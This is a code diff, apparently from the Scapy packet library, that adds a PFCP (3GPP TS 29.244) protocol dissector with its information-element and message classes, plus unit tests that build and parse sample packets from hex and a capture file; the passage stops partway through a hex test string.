IE_Base.fields_desc + [ + XBitField("spare_1", 0, 2), + BitEnumField("interface_type", "S1-U", 6, InterfaceType), + ExtraDataField("extra_data"), + ] + + +class IE_EnterpriseSpecific(IE_Base): + name = "Enterpise Specific" + ie_type = None + fields_desc = IE_Base.fields_desc + [ + ShortEnumField("enterprise_id", None, IANA_ENTERPRISE_NUMBERS), + StrLenField("data", "", length_from=lambda x: x.length - 2), + ] + + +class IE_NotImplemented(IE_Base): + name = "IE not implemented" + ie_type = 0 + fields_desc = IE_Base.fields_desc + [ + StrLenField("data", "", length_from=lambda x: x.length) + ] + + +ietypecls = { + 1: IE_CreatePDR, + 2: IE_PDI, + 3: IE_CreateFAR, + 4: IE_ForwardingParameters, + 5: IE_DuplicatingParameters, + 6: IE_CreateURR, + 7: IE_CreateQER, + 8: IE_CreatedPDR, + 9: IE_UpdatePDR, + 10: IE_UpdateFAR, + 11: IE_UpdateForwardingParameters, + 12: IE_UpdateBAR_SRR, + 13: IE_UpdateURR, + 14: IE_UpdateQER, + 15: IE_RemovePDR, + 16: IE_RemoveFAR, + 17: IE_RemoveURR, + 18: IE_RemoveQER, + 19: IE_Cause, + 20: IE_SourceInterface, + 21: IE_FTEID, + 22: IE_NetworkInstance, + 23: IE_SDF_Filter, + 24: IE_ApplicationId, + 25: IE_GateStatus, + 26: IE_MBR, + 27: IE_GBR, + 28: IE_QERCorrelationId, + 29: IE_Precedence, + 30: IE_TransportLevelMarking, + 31: IE_VolumeThreshold, + 32: IE_TimeThreshold, + 33: IE_MonitoringTime, + 34: IE_SubsequentVolumeThreshold, + 35: IE_SubsequentTimeThreshold, + 36: IE_InactivityDetectionTime, + 37: IE_ReportingTriggers, + 38: IE_RedirectInformation, + 39: IE_ReportType, + 40: IE_OffendingIE, + 41: IE_ForwardingPolicy, + 42: IE_DestinationInterface, + 43: IE_UPFunctionFeatures, + 44: IE_ApplyAction, + 45: IE_DownlinkDataServiceInformation, + 46: IE_DownlinkDataNotificationDelay, + 47: IE_DLBufferingDuration, + 48: IE_DLBufferingSuggestedPacketCount, + 49: IE_PFCPSMReqFlags, + 50: IE_PFCPSRRspFlags, + 51: IE_LoadControlInformation, + 52: IE_SequenceNumber, + 53: IE_Metric, + 54: IE_OverloadControlInformation, + 55: IE_Timer, + 56: IE_PDR_Id, + 57: IE_FSEID, + 58: IE_ApplicationID_PFDs, + 59: IE_PFDContext, + 60: IE_NodeId, + 61: IE_PFDContents, + 62: IE_MeasurementMethod, + 63: IE_UsageReportTrigger, + 64: IE_MeasurementPeriod, + 65: IE_FqCSID, + 66: IE_VolumeMeasurement, + 67: IE_DurationMeasurement, + 68: IE_ApplicationDetectionInformation, + 69: IE_TimeOfFirstPacket, + 70: IE_TimeOfLastPacket, + 71: IE_QuotaHoldingTime, + 72: IE_DroppedDLTrafficThreshold, + 73: IE_VolumeQuota, + 74: IE_TimeQuota, + 75: IE_StartTime, + 76: IE_EndTime, + 77: IE_QueryURR, + 78: IE_UsageReport_SMR, + 79: IE_UsageReport_SDR, + 80: IE_UsageReport_SRR, + 81: IE_URR_Id, + 82: IE_LinkedURR_Id, + 83: IE_DownlinkDataReport, + 84: IE_OuterHeaderCreation, + 85: IE_Create_BAR, + 86: IE_Update_BAR_SMR, + 87: IE_Remove_BAR, + 88: IE_BAR_Id, + 89: IE_CPFunctionFeatures, + 90: IE_UsageInformation, + 91: IE_ApplicationInstanceId, + 92: IE_FlowInformation, + 93: IE_UE_IP_Address, + 94: IE_PacketRate, + 95: IE_OuterHeaderRemoval, + 96: IE_RecoveryTimeStamp, + 97: IE_DLFlowLevelMarking, + 98: IE_HeaderEnrichment, + 99: IE_ErrorIndicationReport, + 100: IE_MeasurementInformation, + 101: IE_NodeReportType, + 102: IE_UserPlanePathFailureReport, + 103: IE_RemoteGTP_U_Peer, + 104: IE_UR_SEQN, + 105: IE_UpdateDuplicatingParameters, + 106: IE_ActivatePredefinedRules, + 107: IE_DeactivatePredefinedRules, + 108: IE_FAR_Id, + 109: IE_QER_Id, + 110: IE_OCIFlags, + 111: IE_PFCPAssociationReleaseRequest, + 112: IE_GracefulReleasePeriod, + 113: IE_PDNType, + 114: IE_FailedRuleId, + 115: IE_TimeQuotaMechanism, + 116: IE_UserPlaneIPResourceInformation, + 117: IE_UserPlaneInactivityTimer, + 118: IE_AggregatedURRs, + 119: IE_Multiplier, + 120: IE_AggregatedURR_Id, + 121: IE_SubsequentVolumeQuota, + 122: IE_SubsequentTimeQuota, + 123: IE_RQI, + 124: IE_QFI, + 125: IE_QueryURRReference, + 126: IE_AdditionalUsageReportsInformation, + 127: IE_CreateTrafficEndpoint, + 128: IE_CreatedTrafficEndpoint, + 129: IE_UpdateTrafficEndpoint, + 130: IE_RemoveTrafficEndpoint, + 131: IE_TrafficEndpointId, + 132: IE_EthernetPacketFilter, + 133: IE_MACAddress, + 134: IE_C_TAG, + 135: IE_S_TAG, + 136: IE_Ethertype, + 137: IE_Proxying, + 138: IE_EthernetFilterId, + 139: IE_EthernetFilterProperties, + 140: IE_SuggestedBufferingPacketsCount, + 141: IE_UserId, + 142: IE_EthernetPDUSessionInformation, + 143: IE_EthernetTrafficInformation, + 144: IE_MACAddressesDetected, + 145: IE_MACAddressesRemoved, + 146: IE_EthernetInactivityTimer, + 147: IE_AdditionalMonitoringTime, + 148: IE_EventQuota, + 149: IE_EventThreshold, + 150: IE_SubsequentEventQuota, + 151: IE_SubsequentEventThreshold, + 152: IE_TraceInformation, + 153: IE_FramedRoute, + 154: IE_FramedRouting, + 155: IE_FramedIPv6Route, + 156: IE_EventTimeStamp, + 157: IE_AveragingWindow, + 158: IE_PagingPolicyIndicator, + 159: IE_APN_DNN, + 160: IE_3GPP_InterfaceType, +} + + +# +# PFCP Messages +# 3GPP TS 29.244 V15.6.0 (2019-07) +# + +# class PFCPMessage(Packet): +# fields_desc = [PacketListField("IE_list", None, IE_Dispatcher)] + + +class PFCPHeartbeatRequest(Packet): + name = "PFCP Heartbeat Request" + fields_desc = [ + PacketListField("IE_list", [IE_RecoveryTimeStamp()], IE_Dispatcher) + ] + + +class PFCPHeartbeatResponse(Packet): + name = "PFCP Heartbeat Response" + fields_desc = [ + PacketListField("IE_list", [IE_RecoveryTimeStamp()], IE_Dispatcher) + ] + + def answers(self, other): + return isinstance(other, PFCPHeartbeatRequest) + + +class PFCPPFDManagementRequest(Packet): + name = "PFCP PFD Management Request" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + +class PFCPPFDManagementResponse(Packet): + name = "PFCP PFD Management Response" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + def answers(self, other): + return isinstance(other, PFCPPFDManagementRequest) + + +class PFCPAssociationSetupRequest(Packet): + name = "PFCP Association Setup Request" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + +class PFCPAssociationSetupResponse(Packet): + name = "PFCP Association Setup Response" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + def answers(self, other): + return isinstance(other, PFCPAssociationSetupRequest) + + +class PFCPAssociationUpdateRequest(Packet): + name = "PFCP Association Update Request" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + +class PFCPAssociationUpdateResponse(Packet): + name = "PFCP Association Update Response" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + def answers(self, other): + return isinstance(other, PFCPAssociationUpdateRequest) + + +class PFCPAssociationReleaseRequest(Packet): + name = "PFCP Association Release Request" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + +class PFCPAssociationReleaseResponse(Packet): + name = "PFCP Association Release Response" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + def answers(self, other): + return isinstance(other, PFCPAssociationReleaseRequest) + + +class PFCPVersionNotSupportedResponse(Packet): + name = "PFCP Version Not Supported Response" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + # TODO: answers() + + +class PFCPNodeReportRequest(Packet): + name = "PFCP Node Report Request" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + +class PFCPNodeReportResponse(Packet): + name = "PFCP Node Report Response" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + def answers(self, other): + return isinstance(other, PFCPNodeReportRequest) + + +class PFCPSessionSetDeletionRequest(Packet): + name = "PFCP Session Set Deletion Request" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + +class PFCPSessionSetDeletionResponse(Packet): + name = "PFCP Session Set Deletion Response" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + def answers(self, other): + return isinstance(other, PFCPSessionSetDeletionRequest) + + +class PFCPSessionEstablishmentRequest(Packet): + name = "PFCP Session Establishment Request" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + +class PFCPSessionEstablishmentResponse(Packet): + name = "PFCP Session Establishment Response" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + def answers(self, other): + return isinstance(other, PFCPSessionEstablishmentRequest) + + +class PFCPSessionModificationRequest(Packet): + name = "PFCP Session Modification Request" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + +class PFCPSessionModificationResponse(Packet): + name = "PFCP Session Modification Response" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + def answers(self, other): + return isinstance(other, PFCPSessionModificationRequest) + + +class PFCPSessionDeletionRequest(Packet): + name = "PFCP Session Deletion Request" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + +class PFCPSessionDeletionResponse(Packet): + name = "PFCP Session Deletion Response" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + def answers(self, other): + return isinstance(other, PFCPSessionDeletionRequest) + + +class PFCPSessionReportRequest(Packet): + name = "PFCP Session Report Request" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + +class PFCPSessionReportResponse(Packet): + name = "PFCP Session Report Response" + fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + + def answers(self, other): + return isinstance(other, PFCPSessionReportRequest) + + +bind_bottom_up(UDP, PFCP, dport=8805) +bind_bottom_up(UDP, PFCP, sport=8805) +bind_layers(UDP, PFCP, dport=8805, sport=8805) +bind_layers(PFCP, PFCPHeartbeatRequest, message_type=1) +bind_layers(PFCP, PFCPHeartbeatResponse, message_type=2) +bind_layers(PFCP, PFCPPFDManagementRequest, message_type=3) +bind_layers(PFCP, PFCPPFDManagementResponse, message_type=4) +bind_layers(PFCP, PFCPAssociationSetupRequest, message_type=5) +bind_layers(PFCP, PFCPAssociationSetupResponse, message_type=6) +bind_layers(PFCP, PFCPAssociationUpdateRequest, message_type=7) +bind_layers(PFCP, PFCPAssociationUpdateResponse, message_type=8) +bind_layers(PFCP, PFCPAssociationReleaseRequest, message_type=9) +bind_layers(PFCP, PFCPAssociationReleaseResponse, message_type=10) +bind_layers(PFCP, PFCPVersionNotSupportedResponse, message_type=11) +bind_layers(PFCP, PFCPNodeReportRequest, message_type=12) +bind_layers(PFCP, PFCPNodeReportResponse, message_type=13) +bind_layers(PFCP, PFCPSessionSetDeletionRequest, message_type=14) +bind_layers(PFCP, PFCPSessionSetDeletionResponse, message_type=15) +bind_layers(PFCP, PFCPSessionEstablishmentRequest, message_type=50) +bind_layers(PFCP, PFCPSessionEstablishmentResponse, message_type=51) +bind_layers(PFCP, PFCPSessionModificationRequest, message_type=52) +bind_layers(PFCP, PFCPSessionModificationResponse, message_type=53) +bind_layers(PFCP, PFCPSessionDeletionRequest, message_type=54) +bind_layers(PFCP, PFCPSessionDeletionResponse, message_type=55) +bind_layers(PFCP, PFCPSessionReportRequest, message_type=56) +bind_layers(PFCP, PFCPSessionReportResponse, message_type=57) + +# FIXME: the following fails with pfcplib-generated pcaps: +# bind_layers(PFCP, PFCPSessionEstablishmentRequest, message_type=50, S=1) +# bind_layers(PFCP, PFCPSessionEstablishmentResponse, message_type=51, S=1) +# bind_layers(PFCP, PFCPSessionModificationRequest, message_type=52, S=1) +# bind_layers(PFCP, PFCPSessionModificationResponse, message_type=53, S=1) +# bind_layers(PFCP, PFCPSessionDeletionRequest, message_type=54, S=1) +# bind_layers(PFCP, PFCPSessionDeletionResponse, message_type=55, S=1) +# bind_layers(PFCP, PFCPSessionReportRequest, message_type=56, S=1) +# bind_layers(PFCP, PFCPSessionReportResponse, message_type=57, S=1) + +# TODO: limit possible child IEs based on IE type + +IE_UE_IP_Address(SD=0, V4=0, V6=0, spare=0) diff --git a/test/contrib/pfcp.uts b/test/contrib/pfcp.uts new file mode 100644 index 00000000000..ec6a7100576 --- /dev/null +++ b/test/contrib/pfcp.uts @@ -0,0 +1,791 @@ +% PFCP tests + +# Type the following command to launch start the tests: +# $ test/run_tests -P "load_contrib('pfcp')" -t test/contrib/pfcp.uts + ++ Build packets & dissect + += Verify IEs + +import scapy.contrib.pfcp as pfcp_mod + +skip_IEs = [ + IE_Base, + IE_Compound +] + +for name, cls in pfcp_mod.__dict__.items(): + if name.startswith("IE_") and type(cls) == Packet_metaclass and cls not in skip_IEs: + print("testing %s" % name) + pkt = cls() + bs = bytes(pkt) + restored = cls(bs) + assert bytes(restored) == bs + # TODO: also test packet field equality + += Verify PCAPs + +~ pcaps + +# the following can be useful while adding more IE types +# (e.g. updating for a newer version of the spec) + +def command(pkt): + f = [] + for fn, fv in sorted(six.iteritems(pkt.fields), key=lambda item: item[0]): + if fn in ("length", "message_type"): + continue + if fn == "ietype" and not isinstance(pkt, IE_EnterpriseSpecific) and \ + not isinstance(pkt, IE_NotImplemented): + continue + if fn.startswith("num_") or fn.endswith("_length"): + continue + if fv is None: + continue + fld = pkt.get_field(fn) + if isinstance(fld, ConditionalField) and not fld._evalcond(pkt): + continue + # if fv == fld.default: + # continue + if isinstance(fv, (list, dict, set)) and len(fv) == 0: + continue + if isinstance(fv, Packet): + fv = command(fv) + elif fld.islist and fld.holds_packets and isinstance(fv, list): + fv = "[%s]" % ",".join(map(command, fv)) + elif isinstance(fld, FlagsField): + fv = int(fv) + else: + fv = repr(fv) + f.append("%s=%s" % (fn, fv)) + c = "%s(%s)" % (pkt.__class__.__name__, ", ".join(f)) + if not isinstance(pkt.payload, NoPayload): + pc = command(pkt.payload) + if pc: + c += "/" + pc + return c + +broken_ies = set([]) + +broken_ie_types = set([ + cls.ie_type for cls in broken_ies +]) + +ignore = set([]) + +def find_raw_or_not_implemented(pkt, prefix=""): + if prefix in ignore: + return False, False + if hasattr(pkt, "IE_list"): + prev = None + found_any = False + for n, ie in enumerate(pkt.IE_list, 1): + if type(ie) in broken_ies: + return False, False + name = "%s-%d-%s" % (prefix, n, type(ie).__name__) + found, leaf = find_raw_or_not_implemented(ie, prefix=name) + if found: + found_any = True + if found and leaf: + print("gotcha: %s %r" % (prefix, ie)) + bs = b"" + if prev is not None: + bs = bytes(prev) + bs += bytes(ie) + if prev is not None: + prev.show2() + ie.show2() + print("%s -- bad val: %s" % (prefix, bytes_hex(bs).decode())) + if len(bs) > 4: + l = bs[2] * 256 + bs[3] + if len(bs) >= l + 4: + print("bad val (length-limited): %s" % bytes_hex(bs[:l + 4]).decode()) + print("bad val (short): %s" % bytes_hex(bytes(ie)).decode()) + prev = ie + return found_any, False + if isinstance(pkt, Raw): + bs = bytes(pkt) + if len(bs) > 4: + ie_type = bs[0] * 256 + bs[1] + if ie_type in broken_ie_types: + return False, True + return True, True + if isinstance(pkt, Padding) or isinstance(pkt, IE_NotImplemented): + return True, True + return False, True + +def find_mismatching_command(pkt, prefix=""): + c = command(pkt) + if hasattr(pkt, "IE_list"): + for n, ie in enumerate(pkt.IE_list, 1): + name = "%s-%d-%s" % (prefix, n, type(ie).__name__) + find_mismatching_command(ie, prefix=name) + if bytes(eval(c)) != bytes(pkt): + print(prefix) + print("ORIG: %s" % bytes_hex(bytes(pkt))) + print("EVAL: %s" % bytes_hex(bytes(eval(c)))) + raise AssertionError("bad command: %s" % c) + +for n, pkt in enumerate(rdpcap("test/pcaps/pfcp.pcap"), 1): + if PFCP in pkt: + # if IE_DLBufferingSuggestedPacketCount in pkt: + # continue + pkt0 = pkt[PFCP] + if IE_NotImplemented in pkt0 or Raw in pkt0 or IE_NotImplemented in pkt0 or Padding in pkt0: + found, leaf = find_raw_or_not_implemented(pkt, prefix=str(n)) + if not found: + # ignored + continue + pkt0.show2() + raise AssertionError("IE_NotImplemented / Raw / Padding detected") + bs = bytes(pkt0) + pkt1 = PFCP(bs) + # TODO: diff show2() result + c0 = command(pkt0) + c1 = command(pkt1) + pkt2 = eval(c1) + c2 = command(pkt2) + if bytes(pkt2) != bs: + find_mismatching_command(pkt0, prefix=str(n)) + print(bytes_hex(bytes(pkt2))) + print(bytes_hex(bs)) + raise AssertionError("bytes(pkt2) != bs") + if bs != pkt0.original: + print(bytes_hex(bs)) + print(bytes_hex(pkt0.original)) + raise AssertionError("bs != pkt0.original") + if bytes(pkt1) != bs: + print(bytes_hex(bytes(pkt1))) + print(bytes_hex(bs)) + raise AssertionError("bytes(pkt1) != bs") + if c0 != c1: + print("COMMAND MISMATCH:\n----\n%s\n----\n%s\n\n" % (c0, c1)) + pkt0.show2() + pkt1.show2() + print(bytes_hex(bytes(pkt0))) + print("packet index: %d\n" % n) + raise AssertionError("c0 != c1") + if c0 != c2: + print("EVAL COMMAND MISMATCH:\n----\n%s\n----\n%s\n\n" % (c0, c2)) + pkt0.show2() + pkt2.show2() + print(bytes_hex(bytes(pkt0))) + print("packet index: %d\n" % n) + raise AssertionError("c0 != c2") + += Build and dissect PFCP Association Setup Request + +pfcpASReqBytes = hex_bytes("200500160000010000600004e1a47d08003c0006020465726777") + +pfcpASReq = PFCP(version=1, S=0, seq=1) / \ + PFCPAssociationSetupRequest(IE_list=[ + IE_RecoveryTimeStamp(timestamp=3785653512), + IE_NodeId(id_type="FQDN", id="ergw") + ]) + +# print("%r" % bytes(pfcpASReq)) +# print("%r" % pfcpASReqBytes) +assert bytes(pfcpASReq) == pfcpASReqBytes + +pfcpASReq = PFCP(pfcpASReqBytes) +assert pfcpASReq.version == 1 +assert pfcpASReq.MP == 0 +assert pfcpASReq.S == 0 +assert pfcpASReq.message_type == 5 +assert pfcpASReq.length == 22 +ies = pfcpASReq[PFCPAssociationSetupRequest].IE_list +assert isinstance(ies[0], IE_RecoveryTimeStamp) +assert ies[0].ietype == 96 +assert ies[0].length == 4 +assert ies[0].timestamp == 3785653512 +assert isinstance(ies[1], IE_NodeId) +assert ies[1].ietype == 60 +assert ies[1].length == 6 +assert ies[1].id_type == 2 +assert ies[1].id == b"ergw" + += Build and dissect PFCP Association Setup Response + +pfcpASRespBytes = hex_bytes("2006008c00000100001300010100600004e1a47af9002b00020001007400092980ac1201020263708002006448f9767070207631392e30382e312d3339377e673465333431343066612d6469727479206275696c7420627920726f6f74206f6e206275696c646b697473616e64626f7820617420576564204465632031312031353a30323a3535205554432032303139") + +pfcpASResp = PFCP(version=1, S=0, seq=1) / \ + PFCPAssociationSetupResponse(IE_list=[ + IE_Cause(cause="Request accepted"), + IE_RecoveryTimeStamp(timestamp=3785652985), + IE_UPFunctionFeatures( + TREU=0, HEEU=0, PFDM=0, FTUP=0, TRST=0, DLBD=0, DDND=0, BUCP=0, + spare=0, PFDE=0, FRRT=0, TRACE=0, QUOAC=0, UDBC=0, PDIU=0, EMPU=1), + IE_UserPlaneIPResourceInformation( + ASSOSI=0, ASSONI=1, TEIDRI=2, V6=0, V4=1, teid_range=0x80, + ipv4="172.18.1.2", network_instance="cp"), + IE_EnterpriseSpecific( + ietype=32770, + enterprise_id=18681, + data="vpp v19.08.1-397~g4e34140fa-dirty built by root on buildkitsandbox at Wed Dec 11 15:02:55 UTC 2019") + ]) + + +pfcpASResp.show2() +assert bytes(pfcpASResp) == pfcpASRespBytes + +pfcpASResp = PFCP(pfcpASRespBytes) +assert pfcpASResp.version == 1 +assert pfcpASResp.MP == 0 +assert pfcpASResp.S == 0 +assert pfcpASResp.message_type == 6 +assert pfcpASResp.length == 140 + +ies = pfcpASResp[PFCPAssociationSetupResponse].IE_list +assert isinstance(ies[0], IE_Cause) +assert ies[0].ietype == 19 +assert ies[0].length == 1 +assert ies[0].cause == 1 +assert isinstance(ies[1], IE_RecoveryTimeStamp) +assert ies[1].ietype == 96 +assert ies[1].length == 4 +assert ies[1].timestamp == 3785652985 +assert isinstance(ies[2], IE_UPFunctionFeatures) +assert ies[2].ietype == 43 +assert ies[2].length == 2 +assert ies[2].TREU == 0 +assert ies[2].HEEU == 0 +assert ies[2].PFDM == 0 +assert ies[2].FTUP == 0 +assert ies[2].TRST == 0 +assert ies[2].DLBD == 0 +assert ies[2].DDND == 0 +assert ies[2].BUCP == 0 +assert ies[2].spare == 0 +assert ies[2].PFDE == 0 +assert ies[2].FRRT == 0 +assert ies[2].TRACE == 0 +assert ies[2].QUOAC == 0 +assert ies[2].UDBC == 0 +assert ies[2].PDIU == 0 +assert ies[2].EMPU == 1 +assert isinstance(ies[3], IE_UserPlaneIPResourceInformation) +assert ies[3].ASSOSI == 0 +assert ies[3].ASSONI == 1 +assert ies[3].TEIDRI == 2 +assert ies[3].V6 == 0 +assert ies[3].V4 == 1 +assert ies[3].teid_range == 0x80 +assert ies[3].ipv4 == "172.18.1.2" +assert ies[3].network_instance == b"cp" +assert isinstance(ies[4], IE_EnterpriseSpecific) +assert ies[4].ietype == 32770 +assert ies[4].enterprise_id == 18681 +assert ies[4].data == b"vpp v19.08.1-397~g4e34140fa-dirty built by root on buildkitsandbox at Wed Dec 11 15:02:55 UTC 2019" + +assert pfcpASResp.answers(pfcpASReq) + +# = Build and dissect PFCP Session Establishment Request + +pfcpSEReq1Bytes = hex_bytes("2132011300000000000000000000020000030021002c000102006c00040000000200040010002a00010000160007066163636573730003000d002c000101006c00040000000100010038006c000400000002005f000100000200190015000901104c9033ac120102001600030263700014000103003800020002001d00040000006400010057006c000400000001000200350016000706616363657373001700210100001d7065726d6974206f75742069702066726f6d20616e7920746f20616e790014000100003800020001001d00040000fde800510004000000010006001b003e000104002500021000004a00040000003c00510004000000010039000d02ffde7210bf97810aac120101003c0006020465726777") + +pfcpSEReq1 = PFCP(version=1, S=1, seq=2, seid=0, spare_oct=0) / \ + PFCPSessionEstablishmentRequest(IE_list=[ + IE_CreateFAR(IE_list=[ + IE_ApplyAction(FORW=1), + IE_FAR_Id(id=2), + IE_ForwardingParameters(IE_list=[ + IE_DestinationInterface(interface="Access"), + IE_NetworkInstance(instance="access"), + ]) + ]), + IE_CreateFAR(IE_list=[ + IE_ApplyAction(DROP=1), + IE_FAR_Id(id=1) + ]), + IE_CreatePDR(IE_list=[ + IE_FAR_Id(id=2), + IE_OuterHeaderRemoval(header="GTP-U/UDP/IPv4"), + IE_PDI(IE_list=[ + IE_FTEID(V4=1, TEID=0x104c9033, ipv4="172.18.1.2"), + IE_NetworkInstance(instance="cp"), + IE_SourceInterface(interface="CP-function"), + ]), + IE_PDR_Id(id=2), + IE_Precedence(precedence=100) + ]), + IE_CreatePDR(IE_list=[ + IE_FAR_Id(id=1), + IE_PDI(IE_list=[ + IE_NetworkInstance(instance="access"), + IE_SDF_Filter(FD=1, flow_description="permit out ip from any to any"), + IE_SourceInterface(interface="Access"), + ]), + IE_PDR_Id(id=1), + IE_Precedence(precedence=65000), + IE_URR_Id(id=1) + ]), + IE_CreateURR(IE_list=[ + IE_MeasurementMethod(EVENT=1), + IE_ReportingTriggers(start_of_traffic=1), + IE_TimeQuota(quota=60), + IE_URR_Id(id=1) + ]), + IE_FSEID(v4=1, seid=0xffde7210bf97810a, ipv4="172.18.1.1"), + IE_NodeId(id_type="FQDN", id="ergw") + ]) + +assert bytes(pfcpSEReq1) == pfcpSEReq1Bytes +assert bytes(PFCP(pfcpSEReq1Bytes)) == pfcpSEReq1Bytes + +pfcpSEReq2Bytes = hex_bytes("213202ba00000000000000000000080000030037002c000102006c00040000000400040026002a000102001600040373676900260015020012687474703a2f2f6578616d706c652e636f6d0003001e002c000102006c0004000000020004000d002a000102001600040373676900030021002c000102006c00040000000300040010002a000100001600070661636365737300030021002c000102006c00040000000100040010002a00010000160007066163636573730001006d006c0004000000040002004b00160007066163636573730017002e0100002a7065726d6974206f75742069702066726f6d203139382e31392e36352e3420746f2061737369676e65640014000100005d0005020ac00000003800020004001d00040000006400510004000000020001006d006c0004000000020002004b00160007066163636573730017002e0100002a7065726d6974206f75742069702066726f6d203139382e31392e36352e3220746f2061737369676e65640014000100005d0005020ac00000003800020002001d0004000000c800510004000000010001006a006c0004000000030002004800160004037367690017002e0100002a7065726d6974206f75742069702066726f6d203139382e31392e36352e3420746f2061737369676e65640014000102005d0005060ac00000003800020003001d00040000006400510004000000020001006a006c0004000000010002004800160004037367690017002e0100002a7065726d6974206f75742069702066726f6d203139382e31392e36352e3220746f2061737369676e65640014000102005d0005060ac00000003800020001001d0004000000c8005100040000000100060013003e000102002500020000005100040000000200060013003e00010200250002000000510004000000010039000d02ffde7210d971c146ac120101003c0006020465726777") + +pfcpSEReq2 = PFCP(seq=8) / PFCPSessionEstablishmentRequest(IE_list=[ + IE_CreateFAR(IE_list=[ + IE_ApplyAction(FORW=1), + IE_FAR_Id(id=4), + IE_ForwardingParameters(IE_list=[ + IE_DestinationInterface(interface="SGi-LAN/N6-LAN"), + IE_NetworkInstance(instance="sgi"), + IE_RedirectInformation(type="URL", address="http://example.com"), + ]) + ]), + IE_CreateFAR(IE_list=[ + IE_ApplyAction(FORW=1), + IE_FAR_Id(id=2), + IE_ForwardingParameters(IE_list=[ + IE_DestinationInterface(interface="SGi-LAN/N6-LAN"), + IE_NetworkInstance(instance="sgi"), + ]) + ]), + IE_CreateFAR(IE_list=[ + IE_ApplyAction(FORW=1), + IE_FAR_Id(id=3), + IE_ForwardingParameters(IE_list=[ + IE_DestinationInterface(interface="Access"), + IE_NetworkInstance(instance="access") + ]) + ]), + IE_CreateFAR(IE_list=[ + IE_ApplyAction(FORW=1), + IE_FAR_Id(id=1), + IE_ForwardingParameters(IE_list=[ + IE_DestinationInterface(interface="Access"), + IE_NetworkInstance(instance="access") + ]) + ]), + IE_CreatePDR(IE_list=[ + IE_FAR_Id(id=4), + IE_PDI(IE_list=[ + IE_NetworkInstance(instance="access"), + IE_SDF_Filter( + FD=1, flow_description="permit out ip from 198.19.65.4 to assigned"), + IE_SourceInterface(interface="Access"), + IE_UE_IP_Address(ipv4="10.192.0.0", V4=1) + ]), + IE_PDR_Id(id=4), + IE_Precedence(precedence=100), + IE_URR_Id(id=2) + ]), + IE_CreatePDR(IE_list=[ + IE_FAR_Id(id=2), + IE_PDI(IE_list=[ + IE_NetworkInstance(instance="access"), + IE_SDF_Filter(FD=1, flow_description="permit out ip from 198.19.65.2 to assigned"), + IE_SourceInterface(interface="Access"), + IE_UE_IP_Address(ipv4="10.192.0.0", V4=1) + ]), + IE_PDR_Id(id=2), + IE_Precedence(precedence=200), + IE_URR_Id(id=1) + ]), + IE_CreatePDR(IE_list=[ + IE_FAR_Id(id=3), + IE_PDI(IE_list=[ + IE_NetworkInstance(instance="sgi"), + IE_SDF_Filter(FD=1, flow_description="permit out ip from 198.19.65.4 to assigned"), + IE_SourceInterface(interface="SGi-LAN/N6-LAN"), + IE_UE_IP_Address(ipv4="10.192.0.0", SD=1, V4=1) + ]), + IE_PDR_Id(id=3), + IE_Precedence(precedence=100), + IE_URR_Id(id=2) + ]), + IE_CreatePDR(IE_list=[ + IE_FAR_Id(id=1), + IE_PDI(IE_list=[ + IE_NetworkInstance(instance="sgi"), + IE_SDF_Filter(FD=1, flow_description="permit out ip from 198.19.65.2 to assigned"), + IE_SourceInterface(interface="SGi-LAN/N6-LAN"), + IE_UE_IP_Address(ipv4="10.192.0.0", SD=1, V4=1) + ]), + IE_PDR_Id(id=1), + IE_Precedence(precedence=200), + IE_URR_Id(id=1) + ]), + IE_CreateURR(IE_list=[ + IE_MeasurementMethod(VOLUM=1), + IE_ReportingTriggers(), + IE_URR_Id(id=2) + ]), + IE_CreateURR(IE_list=[ + IE_MeasurementMethod(VOLUM=1), + IE_ReportingTriggers(), + IE_URR_Id(id=1) + ]), + IE_FSEID(ipv4="172.18.1.1", v4=1, seid=0xffde7210d971c146), + IE_NodeId(id_type="FQDN", id="ergw")]) + +assert bytes(pfcpSEReq2) == pfcpSEReq2Bytes +assert bytes(PFCP(pfcpSEReq2Bytes)) == pfcpSEReq2Bytes + +pfcpSEReq3Bytes = hex_bytes("213203a10000000000000000000003000003001e002c000102006c0004000000060004000d002a000102001600040373676900030037002c000102006c00040000000400040026002a000102001600040373676900260015020012687474703a2f2f6578616d706c652e636f6d0003001e002c000102006c0004000000020004000d002a000102001600040373676900030021002c000102006c00040000000500040010002a000100001600070661636365737300030021002c000102006c00040000000300040010002a000100001600070661636365737300030021002c000102006c00040000000100040010002a000100001600070661636365737300010042006c000400000006000200200018000354535400160007066163636573730014000100005d0005020ac00000003800020006001d00040000009600510004000000030001006d006c0004000000040002004b00160007066163636573730017002e0100002a7065726d6974206f75742069702066726f6d203139382e31392e36352e3420746f2061737369676e65640014000100005d0005020ac00000003800020004001d00040000006400510004000000020001006d006c0004000000020002004b00160007066163636573730017002e0100002a7065726d6974206f75742069702066726f6d203139382e31392e36352e3220746f2061737369676e65640014000100005d0005020ac00000003800020002001d0004000000c800510004000000010001003f006c0004000000050002001d0018000354535400160004037367690014000102005d0005060ac00000003800020005001d00040000009600510004000000030001006a006c0004000000030002004800160004037367690017002e0100002a7065726d6974206f75742069702066726f6d203139382e31392e36352e3420746f2061737369676e65640014000102005d0005060ac00000003800020003001d00040000006400510004000000020001006a006c0004000000010002004800160004037367690017002e0100002a7065726d6974206f75742069702066726f6d203139382e31392e36352e3220746f2061737369676e65640014000102005d0005060ac00000003800020001001d0004000000c8005100040000000100060013003e0001